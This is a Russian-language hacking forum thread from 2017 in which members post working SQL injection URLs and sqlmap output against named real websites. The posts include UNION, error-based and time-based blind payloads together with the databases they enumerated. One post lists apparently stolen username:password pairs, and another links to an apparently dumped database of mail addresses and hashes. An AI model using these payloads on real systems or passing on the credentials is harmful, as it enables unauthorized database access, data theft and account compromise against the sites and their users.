HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #171  
Старый 06.10.2017, 22:44
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

Код:
https://video.bbb.org/vncSearch.php?category=13 UNION ALL SELECT NULL,CONCAT(0x716a6a7671,0x644b4861496f585455585368634d4e6c55486a437768767250584955436345504149454674624f61,0x716a786b71),NULL,NULL,NULL,NULL-- ERFG&bureauId=
available databases [3]:[*] bbbvideo[*] information_schema[*] test
 
Ответить с цитированием

  #172  
Старый 11.10.2017, 19:18
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Код:
http://de.u7buy.com/news/news.html?date=2016-09%' AND 1010=1010 AND '%'='
available databases [1]:[*] u7buy_dbs
 
Ответить с цитированием

  #173  
Старый 12.10.2017, 14:37
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

Код:
http://smmmafia.com/gobig/tnsnfri/rcknrol.php?geo=US' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x6e4e5a72734174575a6f6946495a77786d4142695a6c6b5a594c647a6b6946414657426479557962,0x71767a6b71)-- hajN
Есть идеи что за сайт и для чего он?
 
Ответить с цитированием

  #174  
Старый 15.10.2017, 04:13
SlipX
Новичок
Регистрация: 30.08.2013
Сообщений: 20
С нами: 6685526

Репутация: 0
По умолчанию

http://www.vpscro.com/cn/about.php?id=166

Код:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=166 AND 3378=3378

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=166 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171627071,(SELECT (ELT(2938=2938,1))),0x7178627071,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=166 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-4940 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x794e677a4367776d4c75676a55677158705a414c684b44686c4b67546f545979546e4d636c594a53,0x7178627071),NULL,NULL,NULL,NULL,NULL-- FkYN
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, PHP 5.5.10, Microsoft IIS 7.0
back-end DBMS: MySQL >= 5.5
available databases [18]:[*] bugtracker[*] dzzoffice[*] eyao[*] hdm0130219_db[*] hdm0580028_db[*] information_schema[*] mysql[*] performance_schema[*] pigcms[*] test[*] tsoa[*] ucenter[*] uchome[*] vp_phpcms[*] vp_xcx[*] vppr[*] wecenter[*] wqjk
 
Ответить с цитированием

  #175  
Старый 15.10.2017, 13:18
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Не получается вывести колонки из таблиц, у кого получится скиньте вектор в пм.

аккаунты для входа(без них работать не будет)

Код:
hopkins123:hopkins1
KlausuPirelli:pirelli1
Vishnu24:Ackbar24
momoneyg08:wordupho
Код:
http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+and+updatexml(NULL,concat(0x3a, ( select database()) ),Null)-- -&template_set=3
XPATH syntax error: ':sitedepth'

http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2)))-- -&template_set=3
Duplicate entry 'sitedepth1' for key 'group_key'

tables:
userman
site_settings
users
 
Ответить с цитированием

  #176  
Старый 15.10.2017, 16:32
SlipX
Новичок
Регистрация: 30.08.2013
Сообщений: 20
С нами: 6685526

Репутация: 0
По умолчанию

http://www.golf-in-japan.com/course.php?ID=372

+ bd mail hach username

[HIDE]

https://yadi.sk/i/pxTpczCR3NmKpt

[/HIDE]

Код:
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=372 AND 5008=5008

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ID=372 AND (SELECT 1815 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1815=1815,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: ID=372 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 32 columns
    Payload: ID=-3043 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7071,0x6f49475068796d43755072586e44506f504d575573424141775657754b625a7368574a554c6a6678,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uzrc
---
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
available databases [2]:[*] gij_db[*] information_schema
 
Ответить с цитированием

  #177  
Старый 16.10.2017, 08:30
SlipX
Новичок
Регистрация: 30.08.2013
Сообщений: 20
С нами: 6685526

Репутация: 0
По умолчанию

http://www.odontoprimegroup.com/about.php?id=4

Код:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=4' OR NOT 9339=9339#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=4' AND SLEEP(5)-- iguT
---
web application technology: Apache, PHP 5.4.22
back-end DBMS: MySQL >= 5.0.12
available databases [2]:[*] information_schema[*] odonto_odo
 
Ответить с цитированием

  #178  
Старый 25.10.2017, 09:32
Dri-M
Новичок
Регистрация: 25.11.2012
Сообщений: 6
С нами: 7085846

Репутация: 0
По умолчанию

http://remiremont.fr/associations/detail.php?id=68

Код:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=68 OR (SELECT 8037 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(8037=8037,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=68 OR SLEEP(10)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=68 UNION ALL SELECT NULL,CONCAT(0x7176627071,0x674772756c78427a446a6248755a6e67426e6c47675a546e5449546456755a7257426c534b6b7961,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RzWd
---
http://gloomysunday.hu/shop.php?id=9

Код:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-7104 OR 6087=6087#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=9 AND (SELECT 5231 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(5231=5231,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=9 OR SLEEP(10)
---
 
Ответить с цитированием

  #179  
Старый 04.11.2017, 17:26
sepo
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами: 8445343

Репутация: 0
По умолчанию

New Jersey State Opera

Код:
http://www.njstateopera.org/news.php?id=-6+union+select+1,2,version(),4,database(),6,7,user()--
 
Ответить с цитированием

  #180  
Старый 05.11.2017, 15:29
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами: 7782806

Репутация: 0
По умолчанию

Код:
http://www.salut.ru/ViewTopic.php?Id=2325
http://www.salut.aero/info.php
view-source:http://www.salut.ru/ViewTopic.php?Id=-2325%27+union+select+1,2,3,user(),5,6,database(),version(),9,10,11,12,13,14,15,16%20--%20ccv
| 5.1.67-0ubuntu0.10.04.1 | salut | salut@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.